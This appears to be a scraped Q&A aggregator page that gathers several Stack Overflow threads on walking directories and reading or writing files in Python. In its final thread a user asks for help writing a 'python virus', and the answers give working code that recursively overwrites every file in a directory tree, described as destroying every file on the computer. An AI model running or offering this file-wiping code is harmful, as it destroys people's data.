Searching a folder structure and modifying XML files using Python

Searching a folder structure and modifying XML files using Python - python

I am trying to create a python script that will iterate through a folder structure, find folders named 'bravo', and modify the xml files contained within them.
In the xml files, I want to modify the 'location' attribute of a tag, called 'file'. Such as:
<file location="e:\one\two"/>
I just need to change the drive letter of the file path from ‘e’ to ‘f’. So that it will read:
<file location="f:\one\two"/>
However...
The name of these xml files are unique, so I cannot search for the exact xml file name. Instead I am searching by the xml file type.
Also, there are other xml files in my folder structure, without the ‘file’ tag reference, that I wish to ignore.
The only constant is that the xml files I want to modify are all stored in folders named, ‘bravo’.
I also wish to create a log file that lists all the xml files and their filepaths which have successfully been updated (and preferably the ones that failed).
Using answers to similar questions on this site, I have cobbled together the following script.
In its current state, the script trys to modify every xml files it finds. I have not been able to successfully add code that only searches folders called, ‘bravo'.
When the script modifies an xml file, not in a 'bravo' folder, it errors because these files do not contain a 'file' tag.
Please could someone help me to correct my script (or create a new one).
Here is an example of the folder structure...
My folder structure
And my script so far...
from xml.dom import minidom
import os
# enter the directory where to start search for xml files...
for root, dirs, files in os.walk("c:/temp"):
for file in files:
#search for xml files...
if file.endswith(".xml"):
xml_file = file
xmldoc = minidom.parse(os.path.join(root, xml_file))
# in the xml file look for tag called "file"...
file_location = xmldoc.getElementsByTagName("file")
# i don't understand the next line of code, but it's needed
file_location = file_location[0]
# 'location_string' is a variable for the 'location' path of the file tag in the xml document
location_string = (file_location.attributes["location"].value)
# the new drive letter is added to the location_string to create 'new_location'
new_location = "f" + location_string[1:]
# replace the 'location' value of the file tag with the new location...
file_location.attributes["location"].value = new_location
# write the change to the original file
with open((os.path.join(root, xml_file)),'w') as f:
f.write(xmldoc.toxml())
print "%s has been updated!" % (os.path.join(root, xml_file))
# add updated file name to log...
log_file = open("filepath_update_log.txt", "a")
log_file.write("%s\n" % (os.path.join(root, xml_file)))
log_file.close

Test if the directory name fits, before your second loop. You'd have to get the last directory in the path first. As in: How to get only the last part of a path in Python?
if os.path.basename(os.path.normpath(root)) == "bravo":
You could use the https://docs.python.org/3/library/logging.html module for logging.
If you only want to replace a single letter, then maybe you can directly replace it instead of parsing xml. As suggested in: https://stackoverflow.com/a/17548459/7062162
def inplace_change(filename, old_string, new_string):
# Safely read the input filename using 'with'
with open(filename) as f:
s = f.read()
if old_string not in s:
print('"{old_string}" not found in {filename}.'.format(**locals()))
return
# Safely write the changed content, if found in the file
with open(filename, 'w') as f:
print('Changing "{old_string}" to "{new_string}" in {filename}'.format(**locals()))
s = s.replace(old_string, new_string)
f.write(s)

Related

Python: Iterate through directory to find specific text file, open it, write some of its contents to a new file, close it, and move on to the next dir

I have a script that takes an input text file then finds data in it, puts that data as a variable, then later I call that variable to write to a new file. This snippet of code is just for reading the txt file and storing the data from it as variables.
searchfile = open('C://Users//Me//DynamicFolder//report//summary.txt','r', encoding='utf-8')
slab_count=0
slab_number=[]
slab_total=0
for line in searchfile:
if "Slab" in line:
slab_num = ([float(s) for s in re.findall(r'[-+]?(?:\d*\.\d+|\d+)', line)])
slab_percent = slab_num[-1]
slab_number.append(slab_percent)
slab_count=slab_count+1
slab_total=0
for slab_percent in slab_number:
slab_total+=slab_percent
searchfile.close()
I am using xlsxwriter to write the variables to an excel doc.
My question is, how do I iterate this to search through a given directories sub-directories for summary.txt when there is a dynamic folder.
So C://Users//Me//DynamicFolder//report//summary.txt is a path to one of the files. There are several folders I named DynamicFolder that are there because another process puts them there, they change their names all the time. I need have this script go into each of those dynamic folders to a subdir called report, this is a static name and is always the same. So each of those dynamicfolders has another subdir called report, and in the report folder is a file called summary.txt. I am trying to go through each of those dynamicfolders into the subdir report > summary.txt and then opening and writing data from those txt files.
How do I iterate or loop this? Right now I have 18 folders with those DynamicFolder names that will change when they are over written. How can I put this snip of code to iterate through?
for path in Path('C://Users//Me//DynamicFolder//report//summary.txt').rglob('summary.txt'):
report folder is not the only folder with a summary.txt file, but its the only folder with the file I want. So this code above pulls ALL summary.txt files from all subdir's under the DynamicFolder (not just report folder). I am wondering if I can make this JUST do the 'report' subdir folders under DynamicFolders, and somehow use this to iterate the rest of my code?

Modify all files in specified directory (including subfolders) and saving them in new directory while presevering folder structure (Python)

(I'm new to python so please excuse the probably trivial question. I tried my best looking for similar issues but suprisingly couldn't find someone with the same question.)
I'm trying to build a simple static site generator in Python. The script should take all .txt files in a specific directory (including subfolders), paste the content of each into a template .html file and then save all the newly generated .html files into a new directory while recreating the folder structure of the original directory.
So for I got the code which does the conversion itself for a single file but I'm unsure how to do it for multiple files in a directory.
with open('template/page.html', 'r') as template:
templatedata = template.read()
with open('content/content.txt', 'r') as content:
contentdata = content.read()
pagedata = templatedata.replace('!PlaceholderContent!', contentdata)
with open('www/content.html', 'w') as output:
output.write(pagedata)

To manipulate files and directories, you will need to import some system functionalites under the built-in module os.
import os
The functionalities under the os module include :
Listing the content of a directory :
path_to_template_dir = 'template/'
template_files = os.listdir(path_to_template_dir)
print(template_files)
# Outputs : ['page.html']
Creating a directory (If it does not already exist) :
path_to_output_dir = 'www/'
try :
os.mkdir(path_to_output_dir)
except FileExistsError as e:
print('Directory exists:', path_to_output_dir)
And since you know the names of the directories you want to use, and using these two functions, you now know the names of the files you want to use and generate, you can now concatenate the name of each file to the names of its directories to create the string str of the final file path, which you can then open() for reading and/or writing.
It's hard to give a perfect code example for your question since the logic of how you want to manipulate each of the template and content file is missing, but here is an example for writing a file inside the newly created directory :
path_to_output_file = path_to_output_dir + 'content.html'
with open(path_to_output_file, 'w') as output:
output.write('Content')
And an example for reading all the template files inside the template/ directory and then printing them to the screen.
for template_file in template_files:
path_to_template_file = path_to_template_dir + template_file
with open(path_to_template_file, 'r') as template:
print(template.read())
In the end, manipulating files is all about creating the path string you want to read from or write to, and then accessing it.
Anymore functionalities you might need (for example : checking if a path is a file os.path.isfile() or if it's for a directory os.path.isdir() can be found under the os module.

Write multiple text files to the directory in Python

I was working on saving text to different files. so, now I already created several files and each text file has some texts/paragraph in it. Now, I just want to save these files to a directory. I already created a self-defined directory, but now it is empty. I want to save these text files into my directory.
The partial code is below:
for doc in root:
docID = doc.find('DOCID').text.strip()
text = doc.find('TEXT').text,strip()
f = open("%s" %docID, 'w')
f.write(str(text))
Now, I created all the files with text in it. and I also have a blank folder/directory now. I just don't know how to put these files into the directory.
I would be appreciate it.
========================================================================
[Solved] Thank you guys for your all helping! I figured it out. I just edit my summary here. I got a few problems.
1. my docID was saved as tuple. I need to convert to string without any extra symbol. here is the reference i used: https://stackoverflow.com/a/17426417/9387211
2. I just created a new path and write the text to it. i used this method: https://stackoverflow.com/a/8024254/9387211
Now, I can share my updated code and there is no more problem here. Thanks everyone again!
for doc in root:
docID = doc.find('DOCID').text.strip()
did = ''.join(map(str,docID))
text = doc.find('TEXT').text,strip()
txt = ''.join(map(str,docID))
filename = os.path.join(dst_folder_path, did)
f = open(filename, 'w')
f.write(str(text))

Suppose you have all the text files in home directory (~/) and you want to move them to /path/to/dir folder.
from shutil import copyfile
import os
docid_list = ['docid-1', 'docid-2']
for did in docid_list:
copyfile(did, /path/to/folder)
os.remove(did)
It will copy the docid files in /path/to/folder path and remove the files from the home directory (assuming you run this operation from home dir)

You can frame the file path for open like
doc_file = open(<file path>, 'w')

Adding actual files to a list, instead of just the file's string name

I am having issues reading the contents of the files I am trying to open due to the fact that python believes there is:
"No such file or directory: 'Filename.xrf'"
Here is an outline of my code and what I think the problem may be:
The user's input defines the path to where the files are.
direct = str(raw_input("Enter directory name where your data is: ))
path = "/Users/myname/Desktop/heasoft/XRF_data/%s/40_keV" \
%(direct)
print os.listdir(path)
# This lists the correct contents of the directory that I wanted it to.
So here I essentially let the user decide which directory they want to manipulate and then I choose one more directory path named "40_keV".
Within a defined function I use the OS module to navigate to the corresponding directory and then append every file within the 40_keV directory to a list, named dataFiles.
def Spectrumdivide():
dataFiles = []
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith('.xrf'):
dataFiles.append(file)
Here, the correct files were appended to the list 'dataFiles', but I think this may be where the problem is occurring. I'm not sure whether or not Python is adding the NAME of the file to my list instead of the actual file object.
The code breaks because python believes there is no such file or directory.
for filename in dataFiles:
print filename
f = open(filename,'r') # <- THE CODE BREAKS HERE
print "Opening file: " + filename
line_num = f.readlines()
Again, the correct file is printed from dataFiles[0] in the first iteration of the loop but then this common error is produced:
IOError: [Errno 2] No such file or directory: '40keV_1.xrf'
I'm using an Anaconda launcher to run Spyder (Python 2.7) and the files are text files containing two columns of equal length. The goal is to assign each column to a list and the manipulate them accordingly.

You need to append the path name not just the file's name using the os.path.join function.
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith('.xrf'):
dataFiles.append(os.path.join(root, file))

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.

Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
print item # or do something else with item

So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"

Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

Searching a folder structure and modifying XML files using Python - python

Related

Python: Iterate through directory to find specific text file, open it, write some of its contents to a new file, close it, and move on to the next dir

Modify all files in specified directory (including subfolders) and saving them in new directory while presevering folder structure (Python)

Write multiple text files to the directory in Python

Adding actual files to a list, instead of just the file's string name

Listing Directories In Python Multi Line

Categories

Resources